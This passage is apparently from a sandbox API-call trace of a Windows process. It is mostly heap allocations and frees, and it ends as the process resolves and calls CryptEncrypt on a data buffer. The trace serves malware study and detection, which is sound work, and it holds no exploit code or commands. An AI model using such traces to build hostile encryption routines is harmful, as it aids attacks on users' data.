hHeap=0x970000) returned 1 [0239.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0239.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0239.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0239.848] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0239.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0239.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0239.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0239.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0239.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0239.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0239.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0239.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0239.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0239.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0239.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0239.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0239.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0239.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11111) returned 0x2e91450 [0239.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0239.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0239.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11111) returned 0x2ea2570 [0239.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0239.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0239.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0239.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0239.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0239.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0239.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e91450 | out: hHeap=0x970000) returned 1 [0239.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0239.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0239.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0239.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea2570 | out: hHeap=0x970000) returned 1 [0239.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0239.858] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0239.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0239.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0239.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0239.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0239.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0239.858] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0239.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0239.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0239.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51040 [0239.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0239.858] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0239.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0239.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0239.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0239.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0239.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0239.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0239.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0239.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0239.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0239.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0239.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0239.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0239.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0239.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0239.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0239.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0239.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0239.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0239.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0239.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0239.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0239.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0239.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0239.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0239.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0239.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0239.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0239.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0239.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0239.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0239.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0239.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0239.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0239.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0239.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0239.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0239.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0239.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0239.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0239.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0239.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0239.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0239.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0239.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0239.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0239.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0239.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0239.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0239.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0239.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0239.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0239.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0239.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0239.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0239.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0239.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0239.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0239.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0239.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0239.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0239.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0239.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0239.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0239.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0239.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0239.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0239.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0239.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0239.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11111) returned 0x2e91450 [0240.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0240.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e91450 | out: hHeap=0x970000) returned 1 [0240.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0240.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0240.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0240.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0240.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0240.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0240.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0240.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0240.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x978490 [0240.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0240.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0240.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0240.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0240.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0240.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0240.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0240.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0240.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0240.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0240.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0240.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0240.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0240.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0240.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0240.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0240.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0240.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0240.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0240.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0240.008] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0240.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0240.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0240.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0240.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0240.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0240.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0240.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0240.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0240.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0240.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0240.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0240.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0240.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0240.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0240.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0240.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0240.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0240.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0240.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0240.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0240.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0240.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0240.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0240.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0240.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0240.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0240.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0240.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0240.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0240.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0240.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0240.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0240.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0240.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0240.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0240.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0240.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0240.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0240.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0240.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0240.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0240.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0240.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0240.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0240.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0240.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0240.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0240.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0240.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0240.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0240.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0240.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0240.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0240.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0240.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0240.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0240.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0240.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0240.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0240.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0240.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0240.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0240.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0240.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0240.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0240.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0240.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0240.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0240.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0240.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0240.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0240.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0240.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0240.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0240.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0240.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0240.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0240.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51568 [0240.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51568, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0240.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0240.013] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0240.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0240.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0240.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f828 [0240.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0240.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0240.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0240.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0240.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0240.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0240.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0240.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0240.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0240.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0240.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0240.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0240.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0240.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0240.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0240.014] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e80330*, pdwDataLen=0x8cef60*=0x11111, dwBufLen=0x11118 | out: 